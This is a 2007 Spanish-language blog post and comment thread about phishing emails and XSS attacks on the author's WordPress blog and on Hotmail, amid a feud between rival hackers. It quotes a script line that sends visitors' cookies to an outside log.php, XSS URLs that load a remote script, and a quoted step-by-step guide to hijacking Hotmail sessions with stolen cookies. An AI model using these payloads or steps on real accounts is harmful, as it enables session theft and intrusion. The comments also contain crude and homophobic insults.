Hoy he recibido 2 correos muy interesantes
El primero proviene de
Fernando Muñiz Rozado <ferrotundo30@hotmail.com>
hey eres david talvez esto te interese 😉 LOL
http://webpersonaje.webspacemania.com/
Miércoles, 28 de Marzo de 2007 01:22:16 a.m.
Imaginándome que podría ser ingeniería social, vacié mis cookies y seguí el link, me
encontré que esa pagina hace una llamada a algún sitio de error de MSN y por otro lado
intentaba logear alguna cookie
location.href=’http://webpersonaje.webspacemania.com/log.php?nice=’+escape(document.cookie)
Asumo que esta vez lo que buscaban era la cookie para entrar a mi passport MSN, a log.php
le envie un falso positivo, pensaba floodearlo como floodeo a los que intentan pescar
datos bancarios, pero, mejor platico con Fernando para entender que intenciones tenia con
eso.
El Segundo
De: Nadine Ruiz <mickey_jam99@hotmail.com>
Enviado el: Miércoles, 28 de Marzo de 2007 05:11:07 a.m.
Para: takumax@hotmail.com
Asunto: Bug en tu wordpress
No se si ya estabas enterado pero ahi andan diciendo de la forma en que te
hackearon
https://www.lastdragon.net/?year=%3C/title%3E%3Ch1%3Esip%3C/h1%3E%3CIMG%20SRC=javascript:location.href=http://thablog.freehostia.com/a.js%3E
me gustaria saber si es posible eso ya que cuando entro ahi no sale nada. Como
solucionaste eso?
Y ese bug fue publicado en esta pagina
http://g30rg3x.com/2007/03/10/wp-fixes-bugs-y-mas/
donde se muestra un ejemplo del tipo
http://michoacano.com.mx/?year=%3C/title%3E%3Cscript%3Ealert(String.fromCharCode(103,51,48,114,103,51,95,120,32,119,97,115,32,110,111,116,32,104,101,114,101,32,88,68))%3C/script%3E
pero ahi esta encriptado eso , todo esto te lo comento por que aqui dice que te hackearon
http://www.mbytesecurity.org/posts/ShitPowned.php
Saludos
Sin comentarios para Megabyte, no vale la pena, lo que le podría responder se lo
respondí hace muchísimos días en https://www.lastdragon.net/?p=95
A la pregunta de cómo lo solucione, es muy simple.
Yo antes que usuario Windows, soy usuario del mundo libre de GNU/Linux, uso la computadora
bajo ese estilo de vida, significa que nunca uso cuentas de Administrador, a menos que
tenga algo que administrar, lo mismo ocurre en mi PC, nunca tengo todos los privilegios,
solo para realizar configuraciones o instalar algún programa, incluso tengo otras pc para
laboratorio, donde visito las paginas que considero mas inseguras.
Así es como pude realizar la ingeniería inversa del ataque de Megabyte y lo parche
simplemente siguiendo la lógica del código, escribí un sencillo pero efectivo parche.
Yo me pregunto cuando va a robar una cookie administrador si nunca uso la cuenta, salvo
haya que administrar, es algo que Megabyte no va a entender por que es un perdedor usuario
de Microsft Windows, cuando Megabyte evolucione al software libre y se vea en la necesidad
de tener nivel para usar uno de los mejores sistemas operativos que hay, solo entonces
entenderá por que sus tonterías no funcionan conmigo.
Para bucio, ya arregla tu página
http://bucio.ws/
Cuando le piensas quitar el desfase
Megabyte, Xiam te dejo un recadito aquí.
http://www.mbytesecurity.org/cookie.txt
Ojala nos expliques como Xiam te dejo ese mensajito ahí, me encantaría leerlo
la web de bucio no esta defaceada el puso el index xD
Será que bucio es bucio y sancho a la vez jajaja =), bueno y Megabyte a no, digo este Fernando, ya le levantaron ¿el castigo por fin o aun?
Dicen que megabyte hackeo a el-hacker.com, pero xiam hackeo a megabyte, entonces xiam hackeo a el-hacker.com,
Buena xiam
Megabyte por que borraste el archivo de la cookie. Explícanos como te hackeo xiam
Hola lastdragon…
Te Recomiendo ampliamente que actualizes tu WordPress a la ultima version posible, hay algunos bugs que no se manifestaron publicamente pero que fueron resueltos por el equipo de desarrollo…
En este caso veo que usas la linea 2.0.x de WP…
Aqui mas info sobre los bugs arreglados publicos:
http://trac.wordpress.org/query?status=closed&milestone=2.0.10
Descarga la version 2.0.10 RC3:
http://trac.wordpress.org/changeset/5129/branches/2.0?old_path=%2F&format=zip
Un poco mas de seguridad nunca esta de mas…
Saludos
nananaa we. xD me juakearon ajajja 🙂 na ya lo kite lo que apsa esque mi host es una mierda :(… asi eske puse eso y pes un letrerito 😀 jaahaha saludos 🙂
hahah megagay!! offffffffffffffffffffffffffffff!!! y por si fuera poko http://mbytesecurity.iespana.es me da tanta risa el tal lamersito como se llamaba? megadog? megagay mm no me acuerdo al cabo q significa lo mismo jajajaja
Lo siento megabyte, tuve que borrar tus mensajes nuevamente, no es nada personal, solo es programación =) jajajajaja, oye me has sorprendido enormemente, he deducido que con mi msg puedes saber si estoy online para atacar o no, me pregunto que pasara si te doy falsos positivos y decides atacar pensando que no te veo. Luego haré un articulo de que como volver las armas de ingeniería social contra quienes las lanzan… por ultimo, debo admitir que me has hecho subir de nivel mis políticas de seguridad, no pensé que contigo fuera necesario, la verdad es que espero que pongas el nombre del verdadero autor intelectual detrás del ataque, definitivamente es mucho nivel, no es de tu invención ni de tu propia investigación.
Al menos lograste que incremente un poco la política de seguridad, espero no tener que llevarla al nivel del reto de linuxcampeche, por que tengo mucha flojera ponerme a configurar eso.
————————
Eres bienvenido a poner un nuevo comentario, los anteriores los borre como dije no es personal es parte del show.
Hola g30rg3_x
Gracias por la recomendacion, ya esta hecho aunque no parece que se solucionara el problema del todo. tuve que subir las politicas de seguridad de todo el servicio. Veremos si megabyte lo sigue brincando.
Le preguntaba quien era el autor intelectual, ya veo que no fue el, por lo que entendi en tu blog, has sido tu el autor.
Me gusto tu blog, esta bastante agradable a la vista lo estare visitando y leyendo.
Last Dragon
megabyte off!! SEE Eso es divertido decir off xD!! http://mbytesecurity.iespana.es/ me encanta hacer esto solo una parte de la venganza q se cobra megabyte no subestimes ah las personas q en una de esas te agarran bien gacho!!! Saludosssssssssssssssss
bueno se volvio a lograr mira la página de megabyte jajaja y vuelvo a ganar van 5 veces xD
Ganar?? haha hasta ke me no me defacees solo podras seguir llorando aqui.
Y shitdragon el password ke publike de sponsormoviles estaba en tu mail de takumax 😉
Tu pagina sigue siendo vulnerable a XSS lastdragon.
https://www.lastdragon.net/index.php/%22%3E%3Ch1%3EXSS
y por cierto, megabyte, te crees elite, por usar un el 0day de XSS de moviles.es.msn.com? microsoft ya esta notificado, asique owned 🙂
por cierto, les recomiendo usar el http://www.noscript.net/
Dios .. ahy veces que nu entiendo ajjja xD… es muy dificil el razonamiento… 101
oye megalammer por que dices en tu web
Asi es, cae esta pagina, supongo ke tardara un rato en regresar a la normalidad, seguramente mi ancho de banda se terminara pronto debido a,la gran cantidad de visitas ke tenia esta web, asi que esten pendientes ya ke publikare el metodo con el cual el robe todos sus dominios ME DUELEN LOS WEBOS DE SER TAN HAX0R
por que no dices que te hackearon . que no tienes palabra. que ni siquiera tienes hosting propio. que no tienes diploma. es mas ni siquiera tienes dignida, por que prometistes que el dia que te hackearan desaparecetias…
digo al menos aqui todos sabemos eso.
jajajjajajajjja
MEGALAMER EL PAYASO DE LA RED.
jajajjajaja
Me tienes bastante asombrado Megabyte, por mas que busco mi propia falla , no la encuentro. Llego a la conclusión que el que ha fallado aquí no soy yo. Es Hotmail, eso me deja relajarme un poco por que al final no ha sido a mi a quien has hackeado, esta interesante lo que has logrado. Supongo que ahora me queda investigar que vulnerabilidad tiene que te permite robar sesiones vivas del Hotmail.
Tendré que investigar todo desde la cookie como la tomas hasta como funciona la página de error del msn que es donde supongo que robas la cookie. Visite tu pagina, ahí es donde seguro la robaste, significa que tienes sesiones de todo los que han visitado tu pagina.
Bueno, supongo que estas subiendo en mi lista de ranking. Aun no eres un hacker, pero al meno ya no te veo tan lameroso, digamos que tienes algunas gracias adicionales al DoS
gaysitox
si, veo que aun es vulnerable. es en momentos como este que me gustaria sentarme a programar mi propio blog, pero la realidad me dice que tengo que dedicarle tiempo a los proyectos de la oficina
Ya encontre el super exploit, no manches megabyte usaste un codigo de Antrax, yo pense que lo odiabas, como es posible, bueno ese enlace dice que lo descubrio antrax
Ya he revisado todos los logs, obtuviste la cookie, cuando visite tu pagina. muy bien, ni modos me agarraste desprevenido, bien por ti, por que hiciste algo que no me lo esperaba.
Ahora solo me falta ver que xxs afecta a mi blog y escribir el parche.
Fuente
http://www.noticiashacker.com/2007/03/21/explotando-xss-en-hotmail/
Explotando XSS en Hotmail
Escrito por Marzo 21, 2007
Archivado en Noticias |
Bueno como hotmail parece pasar una vez mas de parchear este gran fallo de seguridad, aqui os exponemos la forma de ataque completa, esperamos que esto sirva para solucionar este fallo lo antes posible.
El fallo consiste en un ataque XSS los codigos a usar para este ataque o exploits son los siguientes.
IND.PHP
INDEX.PHP
LOG.PHP
NICE.JS
Esto se debe guardar como .php en un server que acepte archivos php claro,y cambiando las url donde dice http://www.xxx.com por la web donde tengais alojados los archivos, por ultimo teneis que modificar el NICE.JS cambiando donde dice tuemail@email.com por el email donde quereis que lleguen las cookies.
Para capturar las cookies solo tenemos que enviar un correo a la cuenta de hotmail de la victima con la url donde teneis los archivos siempre usando el directorio raiz o una carpeta nunca el index.php.
Ejemplo: hey mira esto http://www.tuweb.com
Cuando la victima habre el correo y entra en la url las cookies van directamente hacia el email que pusiste.
Una vez tenemos las cookies tenemos que acceder con ellas a la dirección:
http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes
Si lo habeis echo todo bien, aparecereis con la cuenta de correo abierta como si el dueño fueras.
Esto es todo, el bug sigue funcionando perfectamente.
Gracias a Antrax de c-group.org por su descubrimiento.
lastdragon, no es necesario programar wordpress desde 0, solo tienes que filtrar $_SERVER[‘PHP_SELF’] / $PHP_SELF en el archivo de configuracion wp-config.php o deshabilitar el PATH_INFO. De hecho el problema aqui no es de wordpress, es una vulnerabilidad en el tema que estas usando.
No mamen!!! esa fue una vulnerabilidad gruesa de hotmail que tuvieron hace unos dias.. la que uso mega lammer la vulnerabilidad de XSS eso me da alas para decir que esta inscrito en securityfocus y packetstormsecurity como havia dicho anteriormente =) MEGA LAMMER 😀 apesta tu cola 😀
Y mi pregunta es:
Porque shingaos pelean por pendejadas?
Creo ke todos ya sabemos que un lammer es por las acciones no por falta de conocimiento y no es por ser mal pedo pero siempre los veo pelear por pendejadas no digo nicks, pero al que le quede el sako ke seloponga, saludos al inshe Bucio hahahaha xD
Ya dejen de pelear, parecen jotos 😛 ..
Para LastDragon, eso de juzgar a megabyte por que usa windows me diste en la madre a mi y a muchos jajaja.. el hecho de que uses linux no quiere decir que eres mas chingon que un usuario de windows.. debes compararte con otra persona que use el mismo sistema que tu por que win y linux son totalmente distintos =P ..
Otra cosa no es bueno tratar de colgarse de las cosas que hace otra persona..
[Megabyte por que borraste el archivo de la cookie. Explícanos como te hackeo xiam ]
Xiam es Xiam , tu eres tu ..
Al grano.. talvez si alguien hackeo a megabyte fue xiam, no tu, por lo tanto pienso que no deberias de estar tan contento cuuando seas tu quien se lo chingue, tu mismo puedes explicarnos como lo hackeaste o igual le preguntas :
[Megabyte por que borraste el archivo de la cookie. Explícanos como te jakie YO ]
Abstenerse los ocicones , esto solo es para lastdragon y no es nada personal.
Muro:
lo que escribi fue
dije que es un perdedor usuario de Windows, si, refiriéndome a la forma en que ocupa el sistema operativo. Microsoft Windows aunque de forma mediocre soporta posix, y aprovechando esto es posible manejar Windows como se haría en GNU/Linux, lo malo es que no todos los hacen y definitivamente NO GENERALICE, estoy refiriéndome a Megabyte usando Windows no al resto del mundo usando Windows.
No me siento superior a los demás, esas ridiculeces no me quedan.
Tal vez te fijaste con cuidado, pero la pregunta que le hice a megabyte cae en la RETORICA, esperaba que Megabyte explique por que no admite que xiam lo hackeo, en lugar de eso borro el archivo, es una pena que Megabyte no tenga el valor de decir, oye no soy inhackeable a cada rato irrumpen en mis sitio.
No necesito colgarme de nadie para hablar de Megabyte, yo a el ya lo desfase, ya con eso tengo.
El inhackeable, si como no
Quieres que diga yo, pues aquí mira YO
https://www.lastdragon.net/?p=91
y si no te quieres leer toda la novela aquí te dejo el acceso al video
http://www.youtube.com/watch?v=MnQfj7aZ00Y
Gracias por la critica, aunque siento que no es acertada, de todas formas la tomo en cuenta.
perfecto wey. xD
Bueno al que no sepa el Antrax era admin junto con mbyte en el foro underground yo como usuario de c-group me senti ofendido despues de ver eso por que despues de todo lo que le hize mbyte a c-group y sabiendo que el de todo presume titulos, dinero, coche y su nombre >.> se creia un dios de internet ahora debe de estar llorando sin saber que hacer o pagandole a alguien para que lo aga por el que es lo tipico
Espero que eso le quede de leccion y cambie o que se dedique a otra cosa por que definitivamente la informatica no es lo suyo